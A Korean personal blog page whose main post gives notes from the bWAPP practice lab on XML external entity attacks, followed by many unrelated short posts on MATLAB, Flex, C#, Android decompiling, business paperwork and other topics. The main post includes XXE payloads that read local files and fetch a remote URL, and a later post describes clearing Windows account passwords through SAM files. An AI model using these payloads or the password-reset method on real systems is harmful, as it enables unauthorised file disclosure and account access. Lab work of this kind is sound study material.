메뉴 건너뛰기

imp

[bWAPP] XML External Entity Attacks (XXE)

lispro062018.06.15 18:55조회 수 2522댓글 0

  • 1
    • 글자 크기
LFI(Local File Inclusion)
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "file:///windows/win.ini">
]><reset><login>&bWAPP;</login><secret>Any bugs?</secret></reset>

윈도우의 경우 위와 같이 입력하면, 파일 내용 열람이 가능하다.

RFI(Remote File Inclusion) 는 서버 설정으로 allow_url_fopen = on allow_url_include = on 이 필요하다.
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "http://원격주소">
]><result>&bWAPP;</result>

The HackPot : XML External Enitity (XXE) Injection
http://thehackpot.blogspot.com/2014/05/xml-external-enitity-xxe-injection.html?m=1

윈도우(PHP 5.212)는 별 이상이 없는데, linux 서버(PHP 7)에서는 오류가 발생한다.

simplexml_load_string 함수를 호출할 때, $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);

옵션을 주는 방식으로 하면 오류를 제거할 수 있다.

ent.jpg

lispro06 (비회원)
  • 1
    • 글자 크기

댓글 달기

[Tip] Windows NT/2000/XP/2003/Vista 비밀번호 분실 해제

[원문보기]
비밀번호를 잊었다면.


아래의 과정을 시작한다.




버전에 따라서 Password & Registry Tools 번호가 다를 수 있다.



9.9를 이용하길 추천한다.



아래 화면에서 1이나 2를 통해 OS를 찾는다.



얼마간의 시간이 지나면
 
아래와 같이 발견된 sam 파일을 표시한다.


원하는 계정을 선택하고


Y를 누르면 완료된다.


Esc로 빠져나간 후 재부팅 하면 password가 해제된 것을 확인할 수 있다.

melfb.m

[원문보기]

function m = melfb(p, n, fs)
p=9;
n=2048;
fs=2000;
f0 = 700 / fs;
fn2 = floor(n/2);


lr = log(1 + 0.5/f0) / (p+1);


% convert to fft bin numbers with 0 for DC term
bl = n * (f0 * (exp([0 1 p p+1] * lr) - 1));


b1 = floor(bl(1)) + 1;
b2 = ceil(bl(2));
b3 = floor(bl(3));
b4 = min(fn2, ceil(bl(4))) - 1;


pf = log(1 + (b1:b4)/n/f0) / lr;
fp = floor(pf);
pm = pf - fp;


r = [fp(b2:b4) 1+fp(1:b3)];
c = [b2:b4 1:b3] + 1;
v = 2 * [1-pm(b2:b4) pm(1:b3)];


m = sparse(r, c, v, p, 1+fn2);
size_m = size(m);
plot(linspace(0, (fs/2), (n/2)+1),m);
%title('Mel-scale filter bank');
xlabel('Frequency (Hz)');
set(get(gca,'xlabel'),'FontSize',20);
ylabel('Amplitude');
set(get(gca,'ylabel'),'FontSize',20);
set(gca, 'XTick',[0:100:2000], 'XTickLabel',[0:100:1000],'fontsize',20);
set(gca, 'YTick',[0:1:2], 'YTickLabel',[0:1:2],'fontsize',20);

[창업일지] 폐업신고

[원문보기]
 사업자등록증 원본을 들고가서, 폐업신고서와 함께 제출하면 끝!

 뭐야.. 별거 아니잖아...

 잠깐 실업급여나 신청해 볼까.. 음... 좀 더 알아보고....

창업일지 - 홈페이지에 CCL 표기

[원문보기]
라이센스에 대한 구분이 필요해졌다.

[창업일지] 통신판매업 폐업신고

[원문보기]
계양구청 지역경제과에서 계속 전화해서, 몸소 갔다왔다. 제길슨... 폐업신고서를 역시 작성해서 원본과 함께 민원여권과 4번 창구에 제출함.T.T;;;

[flex] flex를 이용한 영상처리(소스 및 라이브러리)

[원문보기]
1. JDK include JRE 설치 2. Tomcat 6.0 설치 3. LiveCycle Data Services 2 설치 4. lcds2의 was 파일 3개를 Pf/ASF/Tomcat 6.0/webapps 로 복사 5. samples 와 samples/dashboard/dashboard.mxml test 6. 여기서 제공되는 Main.as 파일은 이미 수정되었습니다.[ImageProcessinglabMain.as 파일 수정 import de.popforge.imageprocessing.filters.simplify.*; import de.popforge.imageprocessing.filters.noise.*; 후,] ImageProcessing폴더를 C:Program FilesAdobeFlex Builder 3sdks3.0.0bin 이나, C:Program FilesAdobeFlex Builder 3sdks2.x.xbin 으로 옮긴 후, compile.bat 실행 7. Project 선택 후, File->Property에서 Source path에서 ImageEditing 폴더 추가 8. Library path에서 ImageProcessingswcImageProcessing.swc 추가 예제 페이지 : http://suritam9.woweb.net/HelloWorld/imgproc/ImageEditing.html 참고 페이지 : http://blog.je2050.de/2007/02/08/some-updates/ http://www.harrisfamily.net.nz/devblog/index.cfm/2007/2/4/Image-Processing-and-Flash http://www.mojoflex.net/2007/05/flex-image-processing.html http://www.geocities.com/j_c_desai/ImageEditing/ImageEditing.html * 박영식님에 의해서 게시물 이동되었습니다 (2008-07-06 16:40)

활용한 함수

[원문보기]
set(handles.in_play,'enable','on');

속성을 변경한다.

if (strcmp(fs_ampl,' ') || str2num(fs_ampl)<=50)
    msgbox('50보다 큰 값을 입력하세요');

if의 여러 값을 체크하는 연산자


axes(handles.axes4);
plot(0,0);

plot을 0,0으로 하여, 초기화 효과를...

[XML] Dublin Core(DC)

[원문보기]
개념
 1995년 OCLC(Online Computer Library Center)와 NCSA(National Centre for Supercomputer Application)가 더블린(Dublin)에서 개최한 워크숍에서 합의된 메타 데이타
 데이타의 호환성을 유지
 네트웍크 자원의 기술에 필요한 일련의 데이타 요소를 규정
 자원의 신속한 검색 지원
목적
 데이타의 형식/구조 단순화
 원문의 저자나 발행자
 메타 데이타를 직접 작성
 네트웍크 출판을 위한 저작도구의 개발자
 메타 데이타에 대한 템플릿을 직접 소프트웨어에 포함할 수 있도록 
 작성된 데이타를 기초로 특정 분야에서 요구되는 상세한 수준으로 확장 사용  

 Dublin Core 15개 데이터 요소  
 콘텐츠 기술(내용) 요소지적속성요소 물리적 기술(구현)요소 
 Title(표제)
Subject(주제)
Description(설명)
Source(출전)
Language(언어)
Relation(관련자료)
Coverage(내용범위)
Creator(제작자)
Publisher(발행처)
Contributor(기타제작자)
Right(이용조건)
 Date(발행일자)
Type(자료유형)
Format(형식)
Identifier(식별자)

[다음View] 외부게시글 이용해 등록하기

[원문보기]
이미, 블로그가 다음View 에 가입되어 있는데, 외부 게시판에서 등록하고 싶다면, 새로운 아이디를 만들어야 한다.

그래야 가입하기 버튼이 잘 나온다.

xe의 경우 http://주소/xe/?mid=test1&act=rss 로 rss경로를 바꿔줘야 하는데, 이부분은 MY다음view에서 새글보내기를 누르고 설정할 수 있다. 이런 건 설명이 제대로 안 되어 있어서, 날 여러날 괴롭혔다. T.T;;;;

img 파일의 저장

[원문보기]
http://blog.jidolstar.com/web_example/317/

위의 글을 참고하여, img 파일을 캡쳐 후, 저장하였다.

데모 페이지 : http://suritam9.woweb.net/webhard/flex/image.html

원리는 읽어온 image를 base64로 변환해, php파일로 보내서, php에서는 base64 code를 디코드해서 .jpg로 저장한다. * 박영식님에 의해서 게시물 이동되었습니다 (2008-07-06 16:40)

2008년 7월 16일 - 부가세 확정신고

[원문보기]
예정신고를 했기 때문에, 4~6월분만 했다.

[MAC LION] launchpad 아이콘 삭제

[원문보기]
# Clear applications listed in Launchpad
sqlite3 ~/Library/Application Support/Dock/*.db "DELETE from apps;
  DELETE from groups WHERE title<>''; DELETE from items WHERE rowid>2;"
  && killall Dock

위 명령어를 사용하면 된다.
http://verified-fool.tistory.com/55

또다른 방법으로는 launchpad control를 설치해 필요 없는 것을 제거하는 방법이다.

http://chaosspace.de/launchpad-control/

위 사이트에서 받으면 된다.

첨부도 있으니, sh Kill_all_apps_on_Lauchpad.sh 를 실행해 아이콘을 삭제할 수 있고,

Launchpad-Control.prefPane 를 실행해 환경설정에 등록한 후, 보이길 원하지 않는 아이콘을 체크 해제해 적용할 수 있다.

C#으로 만든 웹브라우저

[원문보기]

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;


namespace IEBrowser
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            object o = null;
            // 홈 사이트로 이동
            //axWebBrowser1.GoHome();
            axWebBrowser1.Navigate("http://suritam9.woweb.net/www/seminar/ajax/map2level.htm", ref o, ref o, ref o, ref o);
        }


        private void btnGoBack_Click(object sender, EventArgs e)
        {
            // 뒤로 이동
            axWebBrowser1.GoBack();
        }


        private void btnGoFoward_Click(object sender, EventArgs e)
        {
            // 앞으로 이동
            axWebBrowser1.GoForward();
        }


        private void url_KeyDown(object sender, System.Windows.Forms.KeyEventArgs e)
        {
            if (e.KeyCode == Keys.Enter)
            {
                // 입력받은 url로 이동
                object o = null;
                axWebBrowser1.Navigate(url.Text, ref o, ref o, ref o, ref o);
            }
        }


        private void btnGo_Click(object sender, EventArgs e)
        {
            object o = null;


            // 입력받은 url로 이동
            axWebBrowser1.Navigate(url.Text, ref o, ref o, ref o, ref o);
        }
    }
}

모니터에서 연기가 나면서 타는 냄새가....

[원문보기]

모든 전자제품에서 타는 냄새는 탄탈 캐패시터(Taltal Capacitor)가 파손되어


타기 때문에 생깁니다.


아마 노트북 분해하고 속을 보면 까맣게 탄 자국이 있을 것입니다.


 


탄탈이 타는 이유는 허용할 수 있는 전압치(내압이라고 합니다)가 있는데 이보다 과한 전압이 들어오는 경우


내부에 있는 전해용액이 증발하여 타게 됩니다.


 


처음 사용시엔 이상이 없어 보일 수 있어도, 시간이 지남에 따라 조금씩 조금씩 증발하여 없어지기 때문에 어느 날 갑자기 냄새가 나면서 타게 됩니다.


 


탄탈이 타게되면 전원(Power)과 접지(Ground)가 붙어서 단락(Short)이 발생하여 과전류가 흐르기 때문에 노트북 내부 회로가 보호를 위해 꺼진 것입니다.


 


따라서, 잠깐 켜진다고 다시 사용하면 파손된 탄탈외에 다른 부품들도 파손될 수 있으므로 수리전엔 사용하지 마세요.


 


아마 수리센터로 가면 메인보드를 갈아야 한다고 할 수도 있습니다.


하지만, 이것은 분명히 메인보드 설계오류이기 때문에 따질 필요는 있습니다.


 


최근에는 이러한 탄탈 불량현상 때문에 탄탈은 사용하지 않고 설계하는 추세입니다.

smali <-> java

[원문보기]

http://blog.indiandragon.in/2012/10/ultimate-android-reverse-engineeringdecompiling-guide-part-1-softwares-and-procedure.html


위 사이트를 참고 하면 된다.


https://code.google.com/p/smali/downloads/detail?name=baksmali-1.4.0.jar&can=4&q=


baksmali 를 받고,


> java -jar baksmali-1.4.0.jar classes.dex


하면, out 디렉터리에 smali 코드가 나온다.


다시 dex로 만들 땐 아래와 같이 한다.


> java -jar smali-1.4.0.jar out


음.

[AIR] 클립보드 내용 보기

[원문보기]
TEXT와 IMAGE를 다 가능하게 했습니다.
http://www.flexets.com/show-image-from-clipboard 를 참고 했습니다. * 박영식님에 의해서 게시물 이동되었습니다 (2008-07-06 16:40)

[Webdav] pearl로 취약성 테스트 하기

[원문보기]

위 사이트에서 파일을 다운로드 받아 대상 사이트(< IIS 5)에 테스트 본다.

vmware에서 win 2000 iis5, win 2003 iis6 에서 해봤는데 둘 다 잘 안된다.

기본적으로 prohibit이고, 거의 쓰는데가 없으므로 체크리스트로의 가치가 점점 줄어든다고 할 수 있다.

error가 발생되면서 실행되지 않으면,

# cpan -i HTTP::DAV

를 하여 필요한 내용을 설치해 준다.

11.JPG

travelling salesman problem

[원문보기]
http://webscripts.softpedia.com/script/Miscellaneous/Traveling-Salesman-Problem-34479.html

배열의 사용
1. (:,1) 하면, 1열의 정보를 출력한다.
2. (1,:) 하면, 1행의 정보를 출력한다.
3. [mat mat(1)]하면, 첫행의 정보를 뒤에 덧붙인다.
4. zeros(2,4) 하면, 2x4의 0행렬을 만든다.
5. randperm(x)하면, 1~x까지의 랜덤한 자연수 배열을 만든다.
6. plot은 x,y의 2차 그래프를 그린다.
7. plot3는 x,y,z의 3차 그래프를 그린다.
8. text 함수는 임의의 위치에 문자를 출력한다.
9. colormap sets the current figure's colormap to MAP.
10. flipud함수는 아래와 같이 바꾼다.
  X = 1 4               3 6
        2 5               2 5
        3 6               1 4
첨부 (0)
위로